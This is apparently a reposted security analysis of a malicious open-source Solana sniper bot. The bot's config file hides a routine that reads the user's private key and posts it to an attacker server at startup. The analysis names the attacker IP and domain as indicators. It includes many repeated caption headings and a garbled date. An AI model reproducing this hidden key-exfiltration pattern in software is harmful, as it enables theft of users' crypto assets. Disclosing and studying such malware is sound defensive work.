Malicious Bots Reappear in the Solana Ecosystem, Open Source Project Hides Private Key Theft Trap

robot
Abstract generation in progress

Malicious Bots Reappear in the Solana Ecosystem: Profile Hides Private Key Leak Trap

Recently, a user had their cryptocurrency assets stolen due to using an open-source project called pumpfun-pumpswap-sniper-copy-trading-bot. The security team conducted an in-depth analysis of this.

Static Analysis

Analysis found that suspicious code is located in the /src/common/config.rs configuration file, mainly concentrated in the create_coingecko_proxy() method. This method first calls import_wallet() to obtain the Private Key, and then decodes the malicious URL address.

The decoded real address is:

Malicious code then constructs a JSON request body, encapsulating the private key information within it, and sends it to the above URL via a POST request. Regardless of the server's response, the malicious code will continue to run to avoid raising user awareness.

The create_coingecko_proxy() method is called when the application starts, located in the main() method's configuration file initialization phase in main.rs.

The project was recently updated on GitHub on July 17, 202025, with major changes focused on the configuration file config.rs under the src directory. The original encoding of the HELIUS_PROXY( attacker server address) has been replaced with a new encoding.

Malicious Bots Resurface in Solana Ecosystem: Profile Configuration Hides Private Key Leakage Trap

Malicious Bots Resurface in Solana Ecosystem: Configuration Files Hide Private Key Leakage Traps

Malicious Bots Resurface in the Solana Ecosystem: Profile Configuration Hides Private Key Leakage Trap

Malicious Bots Resurface in the Solana Ecosystem: Configuration Files Conceal Private Key Leakage Traps

Malicious Bots Resurface in Solana Ecosystem: Configuration Files Conceal Private Key Leakage Trap

Malicious Bots Reappear in the Solana Ecosystem: Profile Contains Hidden Private Key Leakage Trap

Malicious Bots Resurface in the Solana Ecosystem: Profile Configuration Hides Private Key Leakage Trap

Malicious Bots Reappear in the Solana Ecosystem: Configuration Files Conceal Private Key Leakage Traps

Dynamic Analysis

To intuitively observe the theft process of malicious code, researchers wrote a Python script to generate test Solana public and private key pairs, and set up an HTTP server to receive POST requests.

Replace the encoded test server address with the malicious server address encoded set by the original attacker, and replace the PRIVATE_KEY(私钥) in the .env file with the test Private Key.

After launching the malicious code, the test server successfully received the JSON data sent by the malicious project, which contains PRIVATE_KEY( private key ) information.

Malicious Bots Resurface in Solana Ecosystem: Profile Configuration Hides Private Key Leakage Trap

Malicious Bots Reappear in the Solana Ecosystem: Profile Hides Private Key Leakage Trap

Malicious Bots Resurface in Solana Ecosystem: Configuration File Hides Private Key Leakage Trap

Malicious Bots Resurface in the Solana Ecosystem: Configuration Files Conceal Private Key Leakage Traps

Malicious Bots Reappear in the Solana Ecosystem: Profile Contains Private Key Leakage Trap

Malicious Bots Resurface in the Solana Ecosystem: Configuration Files Conceal Private Key Leakage Traps

Malicious Bots Resurface in Solana Ecosystem: Configuration File Hides Private Key Leakage Trap

Malicious Bots Resurface in the Solana Ecosystem: Configuration Files Hide Private Key Leakage Traps

Malicious Bots Resurface in the Solana Ecosystem: Configuration Files Conceal Private Key Leakage Traps

Intrusion Indicators ( IoCs )

IP: 103.35.189.28 Domain: storebackend-qpq3.onrender.com

Malicious Repository:

Other repositories with similar implementation methods are also listed.

Malicious Bots Resurface in the Solana Ecosystem: Profile Contains Private Key Leakage Trap

Malicious Bots Resurface in the Solana Ecosystem: Profile Contains Private Key Leak Trap

Summary

The attacker disguises as a legitimate open-source project to lure users into downloading and executing the malicious code. The project reads sensitive information from the local .env file and transmits the stolen Private Key to a server controlled by the attacker.

Developers are advised to remain highly vigilant towards unknown GitHub projects, especially when it involves wallet or Private Key operations. If it is necessary to run or debug, it is recommended to do so in a separate environment without sensitive data to avoid executing malicious programs and commands from unknown sources.

Malicious Bots Resurface in the Solana Ecosystem: Configuration Files Conceal Private Key Leakage Traps

SOL-1.33%
View Original
This page may contain third-party content, which is provided for information purposes only (not representations/warranties) and should not be considered as an endorsement of its views by Gate, nor as financial or professional advice. See Disclaimer for details.
  • Reward
  • 7
  • Share
Comment
0/400
NFTDreamervip
· 18h ago
Another trap for suckers, the tricks are too familiar.
View OriginalReply0
LiquidationWatchervip
· 18h ago
I really didn't expect that sol had such a trap.
View OriginalReply0
AirdropHunterWangvip
· 18h ago
If you're foolish, you just have to fall into traps. Once you get trapped with the Private Key, there's no way to escape.
View OriginalReply0
BlockTalkvip
· 18h ago
Another person has been played for suckers by Solana...
View OriginalReply0
EthMaximalistvip
· 19h ago
Tsk tsk, the sol chain is frequently hacked.
View OriginalReply0
GovernancePretendervip
· 19h ago
Daily reminder, another pitfall, be careful, retail investors.
View OriginalReply0
BearMarketSurvivorvip
· 19h ago
I want to see who else dares to touch this bot.
View OriginalReply0
Trade Crypto Anywhere Anytime
qrCode
Scan to download Gate app
Community
English
  • 简体中文
  • English
  • Tiếng Việt
  • 繁體中文
  • Español
  • Русский
  • Français (Afrique)
  • Português (Portugal)
  • Bahasa Indonesia
  • 日本語
  • بالعربية
  • Українська
  • Português (Brasil)